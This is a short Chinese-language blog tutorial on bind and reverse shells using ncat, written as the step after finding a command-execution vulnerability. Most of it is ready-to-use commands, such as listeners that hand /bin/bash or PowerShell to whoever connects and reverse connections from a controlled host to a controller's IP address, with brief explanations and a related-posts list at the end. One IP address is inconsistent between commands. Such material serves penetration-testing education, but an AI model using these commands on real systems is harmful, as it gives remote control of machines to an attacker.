正反向shell

正反向shell

在实际的应用场景中一般是先找到可以命令执行的漏洞,如果目标主机没有ncat我们要先执行下载ncat命令在被控的服务器上

正向shell

应用场景:在被控端的访问没有限制的时候,控制端向被控端发起了链接,控制端可以是公网ip也可以是内网ip

被控端为Linux:

shell 复制代码
被控端:ncat -lvp 8888 -e /bin/bash
作用:使用 ncat 工具创建一个监听端口,并在接收到连接时执行 /bin/bash

控制端:ncat 117.50.117.71 8888
作用:使用ncat连接到指定的ip地址和端口

被控端为Windows

shell 复制代码
被控端:ncat -lvp 8888 -e powershell
作用:使用 ncat 工具创建一个监听端口,并在接收到连接时执行 powershell

控制端:ncat 117.50.117.71 8888
作用:使用ncat连接到指定的ip地址和端口

在连接成功了之后(即在被控制端输入ncat 117.50.117.71 8888后)就可以输入指令查看被控端的各种信息

如图:

反向shell

应用场景:在被控端口发访问有限制,控制无法直接访问到被控端

由被控端向控制端发起连接,控制端要具备公网地址

被控端为Linux:

shell 复制代码
被控端:ncat 117.50.177.71 9999 -e /bin/bash
作用:使用ncat连接到指定的ip地址端口,在建立连接后执行bashshell
控制端:ncat -lvp 9999
作用:监听指定端口

被控端为Windows

shell 复制代码
被控端:ncat 117.50.117.71 8888 -e powershell
作用:使用ncat连接指定的地址端口,并在连接成功后执行 powershell

控制端:ncat -lvp 8888
作用:监听指定的端口

在控制端监听后即可对被控端控制

相关推荐
网安CILLE2 分钟前
Wireshark 抓包实战演示
linux·网络·python·测试工具·web安全·网络安全·wireshark
运筹vivo@29 分钟前
攻防世界:Web_php_unserialize
前端·web安全·php
三七吃山漆1 小时前
[护网杯 2018]easy_tornado
python·web安全·ctf·tornado
芯盾时代2 小时前
航空行业信息网络安全现状和需求
网络·安全·web安全
2301_810970393 小时前
第一次渗透作业
web安全·php
2301_780789664 小时前
游戏行业抗 DDoS 方案:高并发场景下的 CC 攻击拦截与体验平衡
安全·web安全·游戏·ddos
mooyuan天天4 小时前
万字详解红日靶场8渗透实战 DMZ区(CVE-2017-0144)
web安全·内网渗透·横向移动·红日靶场
运筹vivo@4 小时前
攻防世界:Web_php_include
前端·web安全·php
一只鹿鹿鹿4 小时前
springboot集成工作流教程(全面集成以及源码)
大数据·运维·数据库·人工智能·web安全
吉吉614 小时前
文件包含之伪协议漏洞复现
web安全·网络安全